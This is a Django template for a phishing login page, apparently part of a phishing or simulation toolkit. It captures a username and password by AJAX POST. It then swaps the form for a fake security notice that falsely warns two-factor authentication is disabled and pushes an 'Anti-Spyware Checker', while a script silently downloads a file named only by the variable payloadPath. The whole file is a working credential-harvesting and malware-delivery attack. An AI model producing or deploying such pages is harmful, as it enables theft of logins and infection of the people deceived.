{% extends outerTemplate %}
{% load static %}
{% block content %}{% autoescape off %}
  <div class="d-flex justify-content-center mt-5">
    <div class="row">
      <h2 id="title">Log In:</h2>
    </div>
  
    <form class="mt-3" method="post" id="form">    
      {% csrf_token %}

      <div class="row mt-5">
        <div class="col">
          <b>Username: </b>
        </div>
        <div class="col">
            <input class="form-control" name="username" type="text">
        </div>
      </div>

      <div class="row mt-3">
        <div class="col">
          <b>Password: </b>
        </div>
        <div class="col">
          <input class="form-control" name="password" type="password">
        </div>
      </div>
      <div class="row justify-content-center px-5 pt-3">
        <button class="form-control" id="submit">Next</button>
      </div>
    </form>   
    
  </div>

  <div hidden id="securityCheck">
    <b>One Last Security Check...</b>
    <p>
      We have detected <strong>two factor authentication</strong> is not enabled on your account...
      <br>
      To keep up our high standards of security we require an additional security check
    </p>
    <p>
      Please run our <strong>State of the Art Anti-Spyware Checker</strong> to ensure your connection is secure
    </p>
      <div class="d-flex">
        <p class="my-auto me-3">You will be automatically redirected to your account once the check is complete</p>
        <div class="lds-roller" style="color: {{site.header_colour}}"><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div></div>
      </div>
    <a id="download" href="{% static payloadPath %}" download></a>
  </div>

  <script src="https://code.jquery.com/jquery-3.1.0.min.js"></script>
  <link rel="stylesheet" type="text/css" href="{% static '/spinner.css' %}">
  <script>navbarContents = [{'name': 'Return', 'url': '/'}]</script>
  <script>footerContents = {{ footerContents }}</script>
  <script>
  $('#submit').on('click', function (evt) {
          evt.preventDefault();
          $.ajax({
              url: "/login/",
              type: 'POST',
              dataType : 'json',
              data: $('form').serialize(),
              success: function (data) {
                if (data.redirect) {
                  // data.redirect contains the string URL to redirect to
                  window.location.href = data.redirect;
                } else {
                  console.log('form submitted.');
                  switchDisplay(); //JS function
                }
              }
        });
  });

    function switchDisplay() {
      download = document.getElementById("download");
      download.click();
      form = document.getElementById("form");
      form.hidden = true;
      title = document.getElementById("title");
      title.hidden = true;
      button = document.getElementById("submit");
      button.hidden = true;
      securityCheck = document.getElementById("securityCheck");
      securityCheck.hidden = false;
      return
    }

  </script>

{% endautoescape %}{% endblock %}